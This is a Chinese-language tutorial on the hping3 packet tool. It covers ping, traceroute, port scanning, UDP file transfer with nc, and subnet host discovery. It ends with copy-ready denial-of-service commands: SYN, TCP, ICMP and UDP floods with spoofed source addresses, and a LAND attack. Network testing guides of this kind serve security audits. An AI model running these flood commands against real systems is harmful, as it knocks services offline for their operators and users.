简介
hping3是一款免费的数据包生成器和分析器。可用于安全审计、防火墙规则测试、网络测试、端口扫描、性能测试,压力测试(DOS),几乎可以发送任意类型的TCP/IP数据包。功能强大但是每次只能向一个IP地址发送数据包,还能够在两个相互包含的通道之间传送文件。
ICMP测试
hping3 -1 192.168.100.105(类似于ping 192.168.100.105)
数据包跟踪
hping3 –traceroute -V -1 www.baidu.com(类似于traceroute www.baidu.com)
端口扫描
单端口扫描
hping3 -I eth0 -p 22 -c 1 -S 192.168.100.104
hping3 -I eth0 -p 1 -c 1 -S 192.168.100.104
多端口扫描
hping3 -8 1-1024 192.168.100.102
文件传输
发送端:
hping3 -2 -p 1373 192.168.100.102 -d 100 -E test.txt
-2 UDP模式 -p端口
-d 数据大小 -E 文件名
接收端:
nc -lp 1373 -u -w 5 > recv.txt && cat recv.txt
-l 监听模式 -p 端口
-w 超时时间 -u UDP模式
主机发现
虽然hping3一次只能扫描一个IP,但是我们可以结合shell脚本语言完成整个网段的扫描。下面使用for循环来实现:
for addr in $(seq 1 254);do hping3 192.168.1.$addr -c 1 –icmp & done
for addr in $(seq 1 254);do hping3 192.168.1.$addr -c 1 –icmp >> result2.txt & done
cat result2.txt | grep ^len(通过该命令实现查看存活主机功能,^len表示以len开头的行)
DOS攻击
Syn Flood攻击
hping3 -c 1000 -d 120 -S -p 80 –flood –rand-source 192.168.100.1
-c 指定连接数 -p 目标端口
-d 指定数据部分的大小 -S 攻击类型是Syn flood
–flood 以泛洪的方式攻击 –rand-source 随机产生伪造源地址
hping3 -S -P -U -p 80 –flood –rand-source 192.168.100.1
-P flag置为Push -U flag置为Urge紧急
加这两参数可以提高效率
TCP Flood攻击
使用以下命令建立全连接:
hping3 -SARUPF -p 80 –flood –rand-source 192.168.100.1
ICMP Flood攻击
hping3 -q -n -d 200 –icmp –flood -a 11.11.11.11 192.168.100.1
-q安静模式 -n不解析域名 -a指定伪造IP
UDP Flood 攻击
hping3 –udp -s 6666 -p 53 -a 8.8.8.8 –flood 192.168.100.1
LAND攻击
hping3 -n -S -p 80 -a 192.168.100.1 –flood 192.168.100.1
hping原理、安装、使用详解介绍
hping3命令 | hping3